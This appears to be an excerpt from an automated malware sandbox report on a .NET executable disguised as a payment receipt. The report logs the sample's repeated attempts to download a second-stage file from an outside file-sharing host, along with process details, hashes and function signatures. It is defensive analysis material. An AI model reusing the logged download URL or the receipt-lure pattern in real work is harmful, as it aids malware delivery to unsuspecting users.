2023-11-01 07:30:00 UTC	42	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.4	49766	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:30:05 UTC	44	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:30:10 UTC	44	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:30:10 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:30:10 UTC	44	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.4	49767	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:30:16 UTC	46	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at
2023-11-01 07:30:21 UTC	46	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:30:21 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:30:21 UTC	46	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.4	49768	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:30:26 UTC	48	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:30:36 UTC	48	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:30:36 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:30:36 UTC	48	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49745	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:27:01 UTC	6	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:27:07 UTC	6	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:27:07 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:27:07 UTC	6	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49746	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:27:12 UTC	8	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:27:15 UTC	8	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:27:15 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:27:15 UTC	8	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49748	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:27:20 UTC	10	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:27:21 UTC	10	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:27:21 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:27:21 UTC	10	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49750	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:27:27 UTC	12	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:27:30 UTC	12	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:27:30 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:27:30 UTC	12	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49751	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:27:36 UTC	14	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:27:37 UTC	14	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:27:37 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:27:37 UTC	14	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.4	49752	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:27:42 UTC	16	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at Connection: Keep-Alive
2023-11-01 07:27:43 UTC	16	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:27:43 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:27:43 UTC	16	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.4	49753	5.253.86.15	443	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe

Timestamp	kBytes transferred	Direction	Data
2023-11-01 07:27:49 UTC	18	OUT	GET /qEWc/Y.exe HTTP/1.1 Host: oshi.at
2023-11-01 07:27:51 UTC	18	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 01 Nov 2023 07:27:51 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 1849 Connection: close
2023-11-01 07:27:51 UTC	18	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70 Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up

Target ID:	0
Start time:	08:26:33
Start date:	01/11/2023
Path:	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\PAYMENT_RECEIPT_STAN100699.exe
Imagebase:	0xad0000
File size:	65'088 bytes
MD5 hash:	488CD0C21974D76054D33936D477E0CD
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	low
Has exited:	false

Show Windows behavior

Function 02CF0DE8 Relevance: 11.0, Strings: 8, Instructions: 1030COMMON

Download Yara Rule

Strings

.9l, xrefs: 02CF144D
O>f, xrefs: 02CF11FE
TJpq, xrefs: 02CF0FAB
4'kq, xrefs: 02CF1A39
Tekq, xrefs: 02CF1690
xbnq, xrefs: 02CF0F38
poq, xrefs: 02CF1B1D
UUUU, xrefs: 02CF1453

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID: 4'kq$O>f$TJpq$Tekq$UUUU$poq$xbnq$.9l
API String ID: 0-2723828322
Opcode ID: 6229e37f8c7006a111cddcc0ff96578ea6895439d79bf5756b221009cbfb139f
Instruction ID: d190bd86bd5400b132714488424c8d8160ceddea95085e2791cc9ae4e0c9c6f3
Opcode Fuzzy Hash: 6229e37f8c7006a111cddcc0ff96578ea6895439d79bf5756b221009cbfb139f
Instruction Fuzzy Hash: E9B2CF75A00228DFDB64CF69C984BD9BBB2BF89304F1481E9D54DAB265DB319E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0DD9 Relevance: 4.0, Strings: 3, Instructions: 242COMMON

Download Yara Rule

Strings

TJpq, xrefs: 02CF0FAB
Tekq, xrefs: 02CF1690
xbnq, xrefs: 02CF0F38

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID: TJpq$Tekq$xbnq
API String ID: 0-3321955333
Opcode ID: 983532936acf629b917f777aee19c2d2c4d89e246216fdc4c147851099fbf85f
Instruction ID: 53ea97ce5c742e1360c53303b553b2ef07eea47cefd22a10a73d826b7387adc0
Opcode Fuzzy Hash: 983532936acf629b917f777aee19c2d2c4d89e246216fdc4c147851099fbf85f
Instruction Fuzzy Hash: C1C19475E006188FDB68DF6AC9446DABBF2BF89300F14C1AAD54DAB264DB315E81CF40

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2381 Relevance: .2, Instructions: 184COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7bc21c8eda079efbf821cc781da2d1319cc9a110cb197f2ac18490e62642751
Instruction ID: 893af4bfa91b722ed6c7d9150d3508108ccaf2b6b5ccda38831362dfdc3a0c1a
Opcode Fuzzy Hash: f7bc21c8eda079efbf821cc781da2d1319cc9a110cb197f2ac18490e62642751
Instruction Fuzzy Hash: FE712374D05218CFDBA4DFAAD8947EDBBF6FB89300F109129DA09AB245DB744985CF02

Uniqueness

Uniqueness Score: -1.00%

Function 02CF2560 Relevance: .2, Instructions: 160COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82d6ef89c593b0cf8fd365f7d777e9699a7ade780d71b84dfefd3a748ff0a3f1
Instruction ID: ed497248f846033bef716471b3b3e3d32ddf7168ec03395a2c701db55db9fae1
Opcode Fuzzy Hash: 82d6ef89c593b0cf8fd365f7d777e9699a7ade780d71b84dfefd3a748ff0a3f1
Instruction Fuzzy Hash: 88610274D05218CFDBA4DFAAD4947ADBBF5FB89300F209029DA09EB245DB749985CF02

Uniqueness

Uniqueness Score: -1.00%

Function 02CF25E8 Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed827859c70f5d5faf359e01597ed82c2c511ab532835ad185b56b8c050f335e
Instruction ID: e65a2776cbf0024d79f076af6861ebcf39d1485c9b11e09d36f3e39fc85c8fba
Opcode Fuzzy Hash: ed827859c70f5d5faf359e01597ed82c2c511ab532835ad185b56b8c050f335e
Instruction Fuzzy Hash: 50512474D05218CFDBA0DFA9D8987ADBBF5FB89300F109069DA09EB245DB749985CF02

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0838 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd3650cd38797c06a2ae731b22c5f1a66636ae3ab7c77ebda3e38a2719816cd
Instruction ID: cb2d368e3bfbf23300ab1d85f0968579b8a8fd15ef61d0f7933a5156653a1871
Opcode Fuzzy Hash: 0dd3650cd38797c06a2ae731b22c5f1a66636ae3ab7c77ebda3e38a2719816cd
Instruction Fuzzy Hash: 3551FFB4D01209CFEB94DFAAD8487AEBBF1FF88B01F008529D555A7289D7784A41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 02CF0848 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203526562.0000000002CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2cf0000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a15c2a4ccdcd1effd9463f371a0c2b14aca8d59d1ae40419811c314cea510711
Instruction ID: a57411a2df480f7c3a4bb53511d020136975e2b5b99f309a778931024fccc73e
Opcode Fuzzy Hash: a15c2a4ccdcd1effd9463f371a0c2b14aca8d59d1ae40419811c314cea510711
Instruction Fuzzy Hash: 504102B4D01219CFDB94DFAAD8487AEBBF1FF88B00F009529D515A7289D7744A40CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0108D4DC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203111883.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_108d000_PAYMENT_RECEIPT_STAN100699.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f403b6ae13c05cf9ada52082f0ba0f36de0c42d06339ecfb9015be4a5507b6
Instruction ID: 860bb36ed2672fa083209fb52d0e6c1573d2351a15e42f4072113dc358acf120
Opcode Fuzzy Hash: 39f403b6ae13c05cf9ada52082f0ba0f36de0c42d06339ecfb9015be4a5507b6
Instruction Fuzzy Hash: D8213D71508204DFDB05EF54D5C0B1BBFA5FB94328F20C2AAD9850B296C336D455C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0108D3F0 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4203111883.000000000108D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0108D000, based on PE: false

Joe Sandbox IDA Plugin

